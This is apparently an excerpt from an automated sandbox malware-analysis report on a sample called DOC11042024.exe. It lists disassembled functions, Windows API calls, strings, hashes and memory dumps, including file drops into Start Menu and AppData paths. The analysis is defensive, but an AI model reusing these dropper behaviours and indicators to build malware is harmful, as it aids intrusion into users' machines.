                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404EDD
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404EF2
                                                                              • GlobalFree.KERNEL32(?), ref: 00404F02
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F7B
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405024
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405033
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405053
                                                                              • ShowWindow.USER32(?,00000000), ref: 004050A1
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004050AC
                                                                              • ShowWindow.USER32(00000000), ref: 004050B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: 3e5d4fe0a2a79bc1eed98fbd1ce9b32d6b06213315d57d524d5b2b0e40f02922
                                                                              • Instruction ID: e1925662dd58779e2306908d6fc2d4b9c7baf3d640cb37d024e8ea39260efe5a
                                                                              • Opcode Fuzzy Hash: 3e5d4fe0a2a79bc1eed98fbd1ce9b32d6b06213315d57d524d5b2b0e40f02922
                                                                              • Instruction Fuzzy Hash: CD0270B0A00209EFEB209F54CD85AAE7BB5FB84314F10417AF610BA2E1D7799D52DF58
                                                                              Function 0040458C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004045DB
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404605
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046B6
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004046C1
                                                                              • lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 004046F3
                                                                              • lstrcatW.KERNEL32(?,: Completed), ref: 004046FF
                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404711
                                                                                • Part of subcall function 00405669: GetDlgItemTextW.USER32(?,?,00000400,00404748), ref: 0040567C
                                                                                • Part of subcall function 00406136: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00406199
                                                                                • Part of subcall function 00406136: CharNextW.USER32(?,?,?,00000000), ref: 004061A8
                                                                                • Part of subcall function 00406136: CharNextW.USER32(?,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061AD
                                                                                • Part of subcall function 00406136: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061C0
                                                                              • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 004047D2
                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047ED
                                                                              • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 00404873
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                              • String ID: rigges$$: Completed$A$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213
                                                                              • API String ID: 2246997448-1824939656
                                                                              • Opcode ID: ffba0203ec50202fd1af591eaf61cd09a0f818d728380bfdba4095b3e374861e
                                                                              • Instruction ID: c097c63a260b80efcb898137ead4bfbcbebfeaf6c04a2c0b6202ccd030b94cdc
                                                                              • Opcode Fuzzy Hash: ffba0203ec50202fd1af591eaf61cd09a0f818d728380bfdba4095b3e374861e
                                                                              • Instruction Fuzzy Hash: 6E916DB1900209ABDB10AFA5CD85AAF77B8EF85314F14843BF701B72D1D77C99418B69
                                                                              Function 00405731 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 0040575A
                                                                              • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057A2
                                                                              • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057C5
                                                                              • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057CB
                                                                              • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057DB
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 0040588F
                                                                              • FindClose.KERNEL32(00000000), ref: 004058A0
                                                                              Strings
                                                                              • \*.*, xrefs: 0040579C
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040573F
                                                                              • "C:\Users\user\Desktop\DOC11042024.exe", xrefs: 0040573A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\DOC11042024.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-1391847534
                                                                              • Opcode ID: 8d48512ec1d4757742382f020f1413c2ca8bd04e3c6df695603448cbd25ae85b
                                                                              • Instruction ID: ab14c35d66287b7d119f087b0e90261104e6fcf4636a4d17e295c7c72c5a2f22
                                                                              • Opcode Fuzzy Hash: 8d48512ec1d4757742382f020f1413c2ca8bd04e3c6df695603448cbd25ae85b
                                                                              • Instruction Fuzzy Hash: DC517D31801A04EADB217B618C49AAF7778EF41754F50853BF811B62D1D73C8A91DEAD
                                                                              Function 0040428E Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040432C
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404340
                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040435D
                                                                              • GetSysColor.USER32(?), ref: 0040436E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040437C
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040438A
                                                                              • lstrlenW.KERNEL32(?), ref: 0040438F
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040439C
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043B1
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040440A
                                                                              • SendMessageW.USER32(00000000), ref: 00404411
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040443C
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040447F
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040448D
                                                                              • SetCursor.USER32(00000000), ref: 00404490
                                                                              • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044A5
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044B1
                                                                              • SetCursor.USER32(00000000), ref: 004044B4
                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044E3
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                              • String ID: : Completed$N$open
                                                                              • API String ID: 3615053054-3069340868
                                                                              • Opcode ID: 395f1e8a341a3acf8d3ab52297caf912081d7b5e1a6eee8845e5d3297dd08754
                                                                              • Instruction ID: ed61b046ed3f7b6d336d11d2103cb915c13d96dbd797c0acb536c938d6378b8e
                                                                              • Opcode Fuzzy Hash: 395f1e8a341a3acf8d3ab52297caf912081d7b5e1a6eee8845e5d3297dd08754
                                                                              • Instruction Fuzzy Hash: 927192B1A00209FFDB109F60DD85A6A7B69FB44354F00803AFB05B62D1C778AD61CFA9
                                                                              Function 00405BAE Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 141filestringmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405D64,?,?,00000001,004058F9,?,00000000,000000F1,?), ref: 00405BBE
                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405D64,?,?,00000001,004058F9,?,00000000,000000F1,?), ref: 00405BE2
                                                                              • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405BEB
                                                                                • Part of subcall function 00405A90: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AA0
                                                                                • Part of subcall function 00405A90: lstrlenA.KERNEL32(?,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AD2
                                                                              • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C08
                                                                              • wsprintfA.USER32 ref: 00405C26
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405C61
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405C70
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405C8A
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405CBA
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00425970,00000000,-0000000A,00409544,00000000,[Rename]), ref: 00405D10
                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405D22
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405D29
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405D30
                                                                                • Part of subcall function 00405B2B: GetFileAttributesW.KERNELBASE(00000003,00402D95,00437800,80000000,00000003), ref: 00405B2F
                                                                                • Part of subcall function 00405B2B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                              • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                              • API String ID: 3756836283-3322868524
                                                                              • Opcode ID: 1fb84e7b3f3acc2a231e8d2fa99d458ab44c7ba5484f827976de58849258f507
                                                                              • Instruction ID: 3c0764388f4170debf6dbfee7e8ed18641309b00d4ae587825bdd244f77ffd11
                                                                              • Opcode Fuzzy Hash: 1fb84e7b3f3acc2a231e8d2fa99d458ab44c7ba5484f827976de58849258f507
                                                                              • Instruction Fuzzy Hash: 5541F571608B19BFE2206B619C49F6B3A6CEF45754F14453BF902B62D2D638EC018E7D
                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                              • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                              • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                              • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                              Function 00406136 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00406199
                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004061A8
                                                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061AD
                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\Desktop\DOC11042024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 589700163-967661352
                                                                              • Opcode ID: 7531bfc45c3a0d9c0e360a12fd5bcb7b3753da0bcb1adc44cb2e17581a244e6d
                                                                              • Instruction ID: 0cfc1b77ea1f4d614fc6d1e8c14bbd51de93f2eb6618689411aad4dba739ceca
                                                                              • Opcode Fuzzy Hash: 7531bfc45c3a0d9c0e360a12fd5bcb7b3753da0bcb1adc44cb2e17581a244e6d
                                                                              • Instruction Fuzzy Hash: 3811C87A80421199DB313B148C40AB7A6A8EF557A0F56403FED86773C2E77C5C9286AD
                                                                              Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(?,?,anagallis\salpetersyrlingens\Derrieres,000000FF,C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,00000400,?,?,00000021), ref: 0040252D
                                                                              • lstrlenA.KERNEL32(C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,?,?,anagallis\salpetersyrlingens\Derrieres,000000FF,C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,00000400,?,?,00000021), ref: 00402534
                                                                              • WriteFile.KERNEL32(00000000,?,C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,00000000,?,?,00000000,00000011), ref: 00402566
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                                                              • String ID: 8$C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon$anagallis\salpetersyrlingens\Derrieres
                                                                              • API String ID: 1453599865-2990829865
                                                                              • Opcode ID: d88e3375649909accc0243868dc667090255f3d16d87c8fc5a55372aafdcc3c0
                                                                              • Instruction ID: 6d0498a279a36070217b26b93977b81ee909f2c1d0366e1b319ff4acf78d141b
                                                                              • Opcode Fuzzy Hash: d88e3375649909accc0243868dc667090255f3d16d87c8fc5a55372aafdcc3c0
                                                                              • Instruction Fuzzy Hash: BF019671A04204FAD700ABA0DE89E9F7268EB40319F10053BF102B51D2D7FC5E41DA6D
                                                                              Function 00404158 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404175
                                                                              • GetSysColor.USER32(00000000), ref: 00404191
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040419D
                                                                              • SetBkMode.GDI32(?,?), ref: 004041A9
                                                                              • GetSysColor.USER32(?), ref: 004041BC
                                                                              • SetBkColor.GDI32(?,?), ref: 004041CC
                                                                              • DeleteObject.GDI32(?), ref: 004041E6
                                                                              • CreateBrushIndirect.GDI32(?), ref: 004041F0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
